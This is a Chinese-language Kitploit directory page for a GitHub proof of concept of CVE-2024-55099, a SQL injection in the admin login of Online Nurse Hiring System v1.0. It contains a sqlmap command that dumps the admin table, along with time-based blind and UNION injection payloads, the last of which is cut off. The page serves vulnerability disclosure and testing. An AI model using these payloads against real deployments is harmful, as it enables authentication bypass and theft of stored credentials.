Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — 针对CVE-2024-55099的概念验证利用,演示了在线护士招聘系统v1.0中通过未经净化的用户名参数进行的SQL注入,实现数据库枚举和身份验证绕过。 | Kitploit
工具/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试Archived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

针对CVE-2024-55099的概念验证利用,演示了在线护士招聘系统v1.0中通过未经净化的用户名参数进行的SQL注入,实现数据库枚举和身份验证绕过。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
111年前尚未审核
分享

CVE-2024-55099-在线护士招聘系统v1.0-SQL注入漏洞

  • 漏洞利用作者:ugurkarakoc

厂商主页

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

软件链接

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

概述

  • Online-Nurse-Hiring-System-v1.0 对 'username' 参数的输入验证和清理不足,可能导致 SQL 注入攻击,从而允许未经授权访问数据库并危及系统安全。

漏洞详情

  • CVE ID: CVE-2024-55099
  • 受影响版本:Online-Nurse-Hiring-System-v1.0
  • 漏洞文件:/admin/index.php。
  • 参数名称:username
  • 攻击类型:本地

参考文献:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099

描述

  • 对 'username' 参数缺乏适当的输入验证和清理,使攻击者能够构造 SQL 注入查询,绕过身份验证机制并获取对数据库的未经授权访问。

概念验证 (PoC) :

  • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
---
参数:username (POST)
    类型:基于时间的盲注
    标题:MySQL >= 5.0.12 AND 基于时间的盲注(查询 SLEEP)
    有效载荷:username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    类型:UNION 查询
    标题:通用 UNION 查询(NULL)- 2 列
    有效载荷:username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---

image

下载工具